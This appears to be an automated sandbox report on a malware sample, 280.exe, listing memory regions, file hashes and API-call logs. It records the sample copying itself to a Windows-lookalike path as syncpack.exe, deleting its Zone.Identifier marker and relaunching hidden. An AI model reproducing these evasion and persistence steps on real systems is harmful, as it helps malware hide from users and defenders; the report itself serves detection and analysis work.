private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00267fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0029ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00277fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002b0000 0x002b0000 0x002c9fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002b0000 0x002b0000 0x002b1fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x002c0000 0x002c0fff Memory Mapped File Readable False False False -
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False -
private_0x00000000002e0000 0x002e0000 0x0031ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable True False False -
private_0x0000000000330000 0x00330000 0x003affff Private Memory Readable, Writable True False False -
pagefile_0x00000000003b0000 0x003b0000 0x003b6fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003c0000 0x003c0000 0x003c1fff Pagefile Backed Memory Readable, Writable True False False -
cversions.1.db 0x003d0000 0x003d3fff Memory Mapped File Readable True False False -
cversions.2.db 0x003d0000 0x003d3fff Memory Mapped File Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x003e0000 0x003fefff Memory Mapped File Readable True False False -
280.exe 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000420000 0x00420000 0x0051ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000520000 0x00520000 0x00520fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False -
cversions.2.db 0x00570000 0x00573fff Memory Mapped File Readable True False False -
pagefile_0x0000000000580000 0x00580000 0x00580fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000590000 0x00590000 0x0059ffff Private Memory Readable, Writable True False False -
private_0x00000000005b0000 0x005b0000 0x006affff Private Memory Readable, Writable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00837fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000840000 0x00840000 0x009c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000009d0000 0x009d0000 0x01dcffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01dd0000 0x0209efff Memory Mapped File Readable False False False -
private_0x00000000020a0000 0x020a0000 0x022affff Private Memory Readable, Writable True False False -
pagefile_0x00000000020a0000 0x020a0000 0x0217efff Pagefile Backed Memory Readable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db 0x02180000 0x021affff Memory Mapped File Readable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x021b0000 0x02215fff Memory Mapped File Readable True False False -
private_0x0000000002270000 0x02270000 0x022affff Private Memory Readable, Writable True False False -
private_0x00000000022b0000 0x022b0000 0x023affff Private Memory Readable, Writable True False False -
pagefile_0x00000000023b0000 0x023b0000 0x027a2fff Pagefile Backed Memory Readable True False False -
private_0x00000000027b0000 0x027b0000 0x028affff Private Memory Readable, Writable True False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x743d0000 0x744c4fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x752b0000 0x752c6fff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x75420000 0x7542cfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 104.00 KB MD5: bc1a4dc38f3236982d47496a1151f33f
SHA1: d112719238664d7996048614d75db8a67fc50fc5
SHA256: 85f328a811ca9f10ad82bc3c68d3c348cb069d8378400bf191bb515a6aa63473
False
Threads
Thread 0xb54
405 0
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 48
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1
Fn
Module Get Address function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x771c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x771eae5f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77c0e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x76066aa8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75fc5a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x75fdeceb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75fc110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75fc14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75fc14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75fc1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1
Fn
System Get Time type = Ticks, time = 195843 True 31
Fn
System Get Time type = Ticks, time = 195859 True 8
Fn
System Get Time type = Ticks, time = 195874 True 24
Fn
System Get Time type = Ticks, time = 195890 True 63
Fn
System Get Time type = Ticks, time = 195906 True 22
Fn
System Get Time type = Ticks, time = 195921 True 26
Fn
System Get Time type = Ticks, time = 195937 True 29
Fn
System Get Time type = Ticks, time = 195952 True 46
Fn
System Get Time type = Ticks, time = 198183 True 7
Fn
System Get Time type = Ticks, time = 198199 True 8
Fn
System Get Time type = Ticks, time = 198214 True 10
Fn
Mutex Create mutex_name = PEMB40 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Mutex Create mutex_name = Global\I78B0A7D7 True 1
Fn
Mutex Create mutex_name = Global\M78B0A7D7 True 1
Fn
System Get Time type = Ticks, time = 198214 True 1
Fn
Mutex Release mutex_name = Global\I78B0A7D7 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
System Get Time type = Ticks, time = 198214 True 18
Fn
System Get Time type = Ticks, time = 198230 True 93
Fn
System Get Time type = Ticks, time = 198246 True 77
Fn
System Get Time type = Ticks, time = 198261 True 3
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
System Get Time type = Ticks, time = 198261 True 57
Fn
Module Load module_name = wtsapi32.dll, base_address = 0x75420000 True 1
Fn
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Module Create Mapping module_name = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, process_name = c:\users\kft6utqw\appdata\local\temp\280.exe, desired_access = FILE_MAP_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, type = size True 1
Fn
Module Unmap process_name = c:\users\kft6utqw\appdata\local\temp\280.exe True 1
Fn
System Get Computer Name result_out = XABNCPUWKW True 1
Fn
System Get Time type = Ticks, time = 198308 True 1
Fn
File Get Info filename = C:\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\, type = file_attributes True 1
Fn
System Get Time type = Ticks, time = 198308 True 1
Fn
File Move source_filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, destination_filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe True 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe:Zone.Identifier False 1
Fn
System Get Time type = Ticks, time = 198558 True 1
Fn
Process Create process_name = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, os_pid = 0xb64, show_window = SW_HIDE True 1
Fn
Process #5: syncpack.exe
346 0
»
Information Value
ID #5
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:21, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:47
OS Process Information
»
Information Value
PID 0xb64
Parent PID 0xb50 (c:\users\kft6utqw\appdata\local\temp\280.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B68
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0022cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x0023cfff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0025ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00267fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00277fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x003affff Private Memory Readable, Writable True False False -
wi 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000420000 0x00420000 0x005a7fff Pagefile Backed Memory Readable True False False -
private_0x00000000005b0000 0x005b0000 0x006affff Private Memory Readable, Writable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00830fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000840000 0x00840000 0x01c3ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01c40000 0x01f0efff Memory Mapped File Readable False False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xb68
223 0
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 48
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1
Fn
Module Get Address function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x771c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x771eae5f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77c0e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x76066aa8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75fc5a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x75fdeceb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75fc110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75fc14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75fc14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75fc1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1
Fn
System Get Time type = Ticks, time = 198667 True 40
Fn
System Get Time type = Ticks, time = 198682 True 65
Fn
System Get Time type = Ticks, time = 198698 True 53
Fn
System Get Time type = Ticks, time = 198714 True 51
Fn
System Get Time type = Ticks, time = 198729 True 40
Fn
System Get Time type = Ticks, time = 202411 True 10
Fn
System Get Time type = Ticks, time = 202426 True 13
Fn
System Get Time type = Ticks, time = 202442 True 4
Fn
Mutex Create mutex_name = PEMB50 True 1
Fn
Mutex Create mutex_name = PEMB64 True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Process Create process_name = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, os_pid = 0xb70, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE True 1
Fn
Process #6: syncpack.exe
2216 48
»
Information Value
ID #6
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:25, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:43
OS Process Information
»
Information Value
PID 0xb70
Parent PID 0xb64 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B74
0x B88
0x B94
0x B98
0x B9C
0x BA4
0x BDC
0x 568
0x 878
0x 86C
0x 868
0x 864
0x 860
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0022cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x0023cfff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0025ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000260000 0x00260000 0x002dffff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True False False -
pagefile_0x00000000002e0000 0x002e0000 0x002e7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x0031ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000002f0000 0x002f0000 0x002f7fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000330000 0x00330000 0x00337fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000330000 0x00330000 0x00331fff Pagefile Backed Memory Readable True False False -
private_0x0000000000340000 0x00340000 0x0034ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00350000 0x0038bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000350000 0x00350000 0x00357fff Pagefile Backed Memory Readable, Writable True False False -
windowsshell.manifest 0x00350000 0x00350fff Memory Mapped File Readable False False False -
index.dat 0x00350000 0x0035bfff Memory Mapped File Readable, Writable True False False -
pagefile_0x0000000000360000 0x00360000 0x00361fff Pagefile Backed Memory Readable True False False -
index.dat 0x00370000 0x00377fff Memory Mapped File Readable, Writable True False False -
index.dat 0x00380000 0x0038ffff Memory Mapped File Readable, Writable True False False -
private_0x0000000000390000 0x00390000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x003d0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable True False False -
wi 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000420000 0x00420000 0x0045ffff Private Memory Readable, Writable True False False -
private_0x0000000000460000 0x00460000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004e0000 0x004e0000 0x005dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005e0000 0x005e0000 0x00767fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000770000 0x00770000 0x008f0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000900000 0x00900000 0x01cfffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01d00000 0x01fcefff Memory Mapped File Readable False False False -
private_0x0000000001fd0000 0x01fd0000 0x020cffff Private Memory Readable, Writable True False False -
private_0x00000000020d0000 0x020d0000 0x0221ffff Private Memory Readable, Writable True False False -
private_0x00000000020d0000 0x020d0000 0x021cffff Private Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x021dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000021d0000 0x021d0000 0x021d7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x021d5fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000021e0000 0x021e0000 0x0221ffff Private Memory Readable, Writable True False False -
private_0x0000000002220000 0x02220000 0x0231ffff Private Memory Readable, Writable True False False -
private_0x0000000002320000 0x02320000 0x0241ffff Private Memory Readable, Writable True False False -
private_0x0000000002420000 0x02420000 0x0251ffff Private Memory Readable, Writable True False False -
private_0x0000000002520000 0x02520000 0x0271ffff Private Memory Readable, Writable True False False -
private_0x0000000002520000 0x02520000 0x026bffff Private Memory Readable, Writable True False False -
